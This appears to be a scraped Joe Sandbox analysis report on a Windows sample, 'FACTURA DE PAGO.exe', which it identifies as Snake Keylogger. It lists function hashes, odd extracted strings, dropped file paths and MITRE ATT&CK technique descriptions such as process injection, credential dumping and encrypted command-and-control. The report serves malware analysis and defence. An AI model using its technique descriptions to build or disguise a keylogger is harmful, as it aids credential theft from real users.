Instruction ID: b8359b88e4dd99b230fe859ab4b60761c302d57582e5a286c408c79a79c5753e
Opcode Fuzzy Hash: ccd27e2095f7596f7dadd3266ea89c0f70e3097cd414a292d5ceb6324cf875ac
Instruction Fuzzy Hash: 72512470D05208CBDB04DFEAD444BDEBBF2BB89310F209129E4287B2A4DB759985CF51

Function 20EEF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2834a2a8ffd234f7e4a004c72411e7e9597cf69c0c3450328b85c696221a6a48
Instruction ID: c8b58711b97b66540fcbacb567b3d0e47066f6257a08b05194ca8c3e45473a65
Opcode Fuzzy Hash: 2834a2a8ffd234f7e4a004c72411e7e9597cf69c0c3450328b85c696221a6a48
Instruction Fuzzy Hash: 96510070D05208CFDB04DFEAD484B9EBBB2FB49324F209119E429BB2A5D7399981CF51

Function 20EE7700 Relevance: 10.5, Strings: 8, Instructions: 474COMMON

Download Yara Rule

Strings

(o^q, xrefs: 20EE7BFF
,bq, xrefs: 20EE7B90
(o^q, xrefs: 20EE77E9
,bq, xrefs: 20EE7BA0
(o^q, xrefs: 20EE78B2
(o^q, xrefs: 20EE772E
(o^q, xrefs: 20EE7C0F
(o^q, xrefs: 20EE7815

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: df0d8ade0315c79c5160fc9a3faddc4e6c1342fcfb16fbc1e429e43692ad1a20
Instruction ID: ea8ff4e8e3edb54cf8712eff183e46f522fa8b2fca49be44b96bdd15e0b24e55
Opcode Fuzzy Hash: df0d8ade0315c79c5160fc9a3faddc4e6c1342fcfb16fbc1e429e43692ad1a20
Instruction Fuzzy Hash: F9125C30A002099FCB15CFAAD985A9EBBF2FF48324F208559E659DB361D731ED85CB50

Function 20EE2A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xbq, xrefs: 20EE2A9E
Xbq, xrefs: 20EE2AD8
Xbq, xrefs: 20EE2BA4
Xbq, xrefs: 20EE2B57

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: bb4f2f11366e2b17b87493f23a5feaf1f41b22708da7fc98e1af546db9947b6b
Instruction ID: c6dc3156f23076a37f2bcfb69f1ca22faa6562f3898394735cba5fc773b18d9c
Opcode Fuzzy Hash: bb4f2f11366e2b17b87493f23a5feaf1f41b22708da7fc98e1af546db9947b6b
Instruction Fuzzy Hash: 53316231E0021D8BDB64CFAA89817AFB7B6AB84324F104579C51DA7255EB30CEC1CB92

Function 20EE6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 20EE695E
\;^q, xrefs: 20EE6936
\;^q, xrefs: 20EE692C
\;^q, xrefs: 20EE6952

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 4ea1975656993104c46907583e8804f0dd4fd5da4fb3378123bddcdf587b1486
Instruction ID: d3497f53d55545f85f34d9dc54cf9df0132f14f78aa9438bf39c7f191444bff9
Opcode Fuzzy Hash: 4ea1975656993104c46907583e8804f0dd4fd5da4fb3378123bddcdf587b1486
Instruction Fuzzy Hash: EC01BC71B401088FCB048EAEC54490933EBAFC8AB4721446AE549CF3B7DA32EC818750

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FACTURA DE PAGO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0htniaqs.pgk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41efao5z.m12.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_laf1hwwh.w4g.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlkuzx1i.pt2.ps1

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\strudsfjerenes.uns

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\unnamed.jpg

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Klipfisks\psychograph.rut

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Dichapetalum\aktivitetsrunde.txt

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Dichapetalum\discourteously.gam

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen

Windows Analysis Report
FACTURA DE PAGO.exe

Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00405D51 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre